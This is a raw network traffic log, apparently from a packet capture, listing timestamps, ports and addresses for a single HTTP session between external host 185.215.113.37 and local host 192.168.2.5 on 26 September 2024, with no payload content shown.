Sep 26, 2024 21:14:13.991906881 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991921902 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991940975 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991942883 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991955996 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991956949 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991965055 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991971970 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991977930 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991992950 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.992014885 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.992046118 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.992360115 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.992373943 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.992413998 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.992470026 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.992485046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.992497921 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.992508888 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.992537022 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.034800053 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.039727926 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273385048 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273420095 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273431063 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273482084 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.273518085 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.273555994 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273567915 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273577929 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273590088 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273607016 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.273622036 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.273648024 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.273802996 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273814917 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273824930 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273835897 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273845911 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.273881912 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.273881912 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.273905039 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274060965 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274106026 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274144888 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274156094 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274167061 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274177074 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274188042 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274195910 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274208069 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274236917 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274595022 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274605036 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274615049 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274625063 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274636030 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274646044 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274650097 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274657011 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274669886 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274669886 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274682999 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274692059 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274693012 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274705887 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274713993 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274718046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.274732113 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274750948 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.274772882 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.275306940 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275316954 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275327921 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275337934 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275347948 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275355101 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.275358915 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275377035 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275391102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.275393963 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275398970 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.275399923 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275408983 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275419950 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275432110 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.275433064 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.275458097 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.275470972 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.276118040 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276129007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276139021 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276149035 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276160002 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276165962 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276173115 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.276176929 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276187897 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276199102 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276207924 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276212931 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.276221037 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276231050 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276231050 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.276242971 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276253939 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276257992 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.276266098 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.276268959 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.276293039 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.276304007 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.276989937 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277000904 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277010918 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277020931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277030945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277040958 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277040958 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277054071 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277064085 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277070045 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277086973 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277101040 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277113914 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277582884 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277592897 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277602911 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277611971 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277621984 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277630091 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277631998 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277645111 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277654886 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277657032 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277666092 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277673960 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277678013 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277694941 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277694941 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277705908 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277717113 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277724028 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277728081 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277734041 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277740955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277750015 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.277762890 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277781963 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.277793884 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.278527021 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278537989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278547049 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278557062 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278567076 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278578043 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278578043 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.278589010 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278599024 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278609037 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278611898 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.278619051 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278623104 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.278630018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278640985 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278645992 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.278655052 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.278661966 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.278685093 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.278708935 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.279439926 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279452085 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279462099 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279473066 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279483080 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279494047 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279495955 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.279510021 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279516935 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279522896 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.279522896 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279529095 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279535055 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279540062 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279541969 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279545069 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.279546976 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279552937 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.279570103 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.279582024 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.279601097 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.363957882 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364016056 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364020109 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364028931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364058971 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364073038 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364188910 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364200115 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364209890 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364222050 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364233017 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364243031 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364270926 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364386082 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364428997 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364444017 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364455938 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364465952 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364494085 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364509106 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364617109 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364629030 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364639997 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364651918 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364665985 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364689112 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364825964 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364839077 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364881992 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.364984989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.364995003 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365005970 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365016937 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365029097 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365035057 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.365041018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365045071 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.365055084 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365070105 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.365088940 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.365372896 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365386009 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365421057 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.365617037 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365628958 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365639925 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365650892 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365663052 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365670919 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.365674019 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365680933 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.365686893 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365699053 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365703106 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.365710974 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365721941 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.365730047 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.365750074 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.365770102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.366249084 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366261005 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366271019 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366281033 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366291046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366301060 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366305113 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.366313934 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366327047 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366328955 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.366338015 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.366338968 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366352081 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.366352081 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366364956 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366375923 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366378069 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.366388083 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366399050 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.366400003 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.366421938 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.366431952 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367095947 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367106915 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367117882 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367127895 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367139101 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367150068 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367151022 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367161989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367170095 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367173910 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367187023 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367187977 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367197037 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367197990 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367211103 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367218971 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367223978 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367237091 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367249012 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367249966 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367261887 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367286921 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367837906 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367851019 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367861032 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367888927 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367904902 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.367985010 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.367996931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368006945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368017912 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368031979 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.368108988 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.368140936 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368153095 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368163109 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368182898 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368186951 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.368196011 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368208885 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368221045 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.368227005 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368232965 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.368240118 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368252039 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368259907 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.368263960 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368277073 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.368277073 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.368304968 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.368319035 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.369160891 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369177103 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369184017 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369189024 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369194984 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369196892 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369199038 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369210005 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369220018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369223118 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.369232893 CEST	80	49705	185.215.113.37	192.168.2.5
